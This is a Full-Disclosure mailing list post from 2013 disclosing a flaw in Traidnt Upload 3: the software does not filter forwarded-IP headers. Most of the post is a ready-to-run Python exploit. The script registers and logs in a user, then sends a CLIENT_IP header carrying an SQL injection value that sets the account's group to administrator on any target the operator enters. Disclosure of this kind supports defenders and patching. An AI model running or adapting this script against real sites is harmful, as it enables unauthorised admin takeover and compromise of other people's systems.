[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Traidnt up 3 , Admin info reset exploit
- To: submissions@xxxxxxxxxxxxxxxxxxxxxxx, submit@xxxxxxxxxx, submit@xxxxxxxxxxx, submit@xxxxxxxxxxxxxx, vuldb@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Traidnt up 3 , Admin info reset exploit
- From: 0u7 5m4r7 <n0p1337@xxxxxxxxx>
- Date: Sun, 15 Dec 2013 18:45:40 +0200
Traidnt upload version 3
don't filter the x_forwarded_for header which allow the attacker to exploit
it to update administrator's data
#!/usr/bin/python
import urllib2
import sys
print """
+-------------------------------------------+
| Traidnt upload 3 - Admin add Exploit |
| By i-Hmx |
| sec4ever.com |
| n0p1337@xxxxxxxxx |
+-------------------------------------------+"""
target=str(raw_input("[*] Enter Target <http://site.com/path> # "))
print "[+] Adding new user"
try:
register=urllib2.urlopen(target+"/register.php","name=farsawy&email=n0p1337@xxxxxxxxx&password=sec4ever&rules=faris
rules")
except:
print "[-] Exception happened :("
sys.exit()
print "[+] Grabbing Cookies"
login=urllib2.urlopen(target+"/login.php?do=login","username=farsawy&password=sec4ever")
headers=login.headers.items()
for header in headers:
if header[0]=="set-cookie":
cookies=header[1]
if cookies.find("upload_sid")==-1:
print "[-] Exploitation Failed"
sys.exit()
print "[+] Upgrading privelages"
req=urllib2.Request(target+"/cp.php",headers={"Cookie":cookies,"CLIENT_IP":"1337',`group`='1"})
upgrade=urllib2.urlopen(req)
print "[+] Login with the following data\n + User : farsawy\n + pass :
sec4ever\n + Probably you are an admin now ;)"
sys.exit()_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/